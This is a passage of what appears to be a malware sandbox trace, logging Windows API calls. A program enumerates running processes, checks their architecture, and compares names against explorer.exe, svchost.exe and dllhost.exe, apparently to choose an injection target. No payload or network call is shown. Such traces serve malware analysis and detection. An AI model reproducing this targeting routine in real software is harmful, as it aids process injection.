szExeFile="svchost.exe")) returned 1 [0259.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0259.656] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0259.657] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0259.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0259.657] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0259.658] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0259.658] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0259.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0259.659] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.659] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.659] CloseHandle (hObject=0xec) returned 1 [0259.659] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0259.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0259.660] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0259.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0259.660] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.660] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.660] CloseHandle (hObject=0xec) returned 1 [0259.660] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0259.661] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0259.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0259.661] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0259.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0259.662] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.662] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.662] CloseHandle (hObject=0xec) returned 1 [0259.662] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0259.662] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0259.662] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0259.662] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0259.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0259.662] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.662] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.662] CloseHandle (hObject=0xec) returned 1 [0259.662] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0259.662] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0259.663] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0259.663] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0259.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0259.663] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.663] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.663] CloseHandle (hObject=0xec) returned 1 [0259.663] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0259.663] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0259.663] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0259.663] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0259.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0259.664] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.664] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.664] CloseHandle (hObject=0xec) returned 1 [0259.664] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0259.664] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0259.664] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0259.664] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0259.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0259.664] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.664] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.664] CloseHandle (hObject=0xec) returned 1 [0259.665] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0259.665] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0259.665] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0259.665] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0259.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0259.665] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.665] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.665] CloseHandle (hObject=0xec) returned 1 [0259.665] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0259.665] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0259.665] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0259.665] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0259.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0259.666] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.666] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.666] CloseHandle (hObject=0xec) returned 1 [0259.666] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0259.666] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0259.666] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0259.666] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0259.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0259.667] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.667] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.667] CloseHandle (hObject=0xec) returned 1 [0259.667] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0259.667] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0259.667] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0259.667] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0259.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0259.667] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.667] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.667] CloseHandle (hObject=0xec) returned 1 [0259.667] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0259.667] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0259.667] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0259.667] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0259.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0259.668] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.668] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.668] CloseHandle (hObject=0xec) returned 1 [0259.668] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0259.668] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0259.668] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0259.668] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0259.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0259.669] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.669] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.669] CloseHandle (hObject=0xec) returned 1 [0259.669] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0259.669] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0259.669] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0259.669] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0259.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0259.669] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.669] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.669] CloseHandle (hObject=0xec) returned 1 [0259.669] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0259.669] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0259.669] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0259.669] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0259.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0259.670] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.670] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.670] CloseHandle (hObject=0xec) returned 1 [0259.670] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0259.670] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0259.670] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0259.670] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0259.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0259.671] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.671] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.671] CloseHandle (hObject=0xec) returned 1 [0259.671] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0259.671] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0259.671] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0259.671] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0259.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0259.671] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.671] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.671] CloseHandle (hObject=0xec) returned 1 [0259.672] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0259.672] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0259.672] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0259.672] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0259.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0259.672] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.672] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.672] CloseHandle (hObject=0xec) returned 1 [0259.672] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0259.672] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0259.672] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0259.672] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0259.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0259.673] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.673] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.673] CloseHandle (hObject=0xec) returned 1 [0259.673] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0259.673] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0259.673] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0259.673] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0259.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0259.673] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.674] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.674] CloseHandle (hObject=0xec) returned 1 [0259.674] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0259.674] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0259.674] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0259.674] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0259.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0259.674] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.674] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.674] CloseHandle (hObject=0xec) returned 1 [0259.674] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0259.674] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0259.674] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0259.674] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0259.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0259.675] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.675] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.675] CloseHandle (hObject=0xec) returned 1 [0259.675] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0259.675] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0259.675] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0259.675] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0259.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0259.676] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.676] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.676] CloseHandle (hObject=0xec) returned 1 [0259.676] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0259.676] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0259.676] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0259.676] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0259.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0259.676] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0259.677] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0259.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0259.677] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0259.678] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0259.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0259.678] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0259.679] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0259.679] IsWow64Process (in: 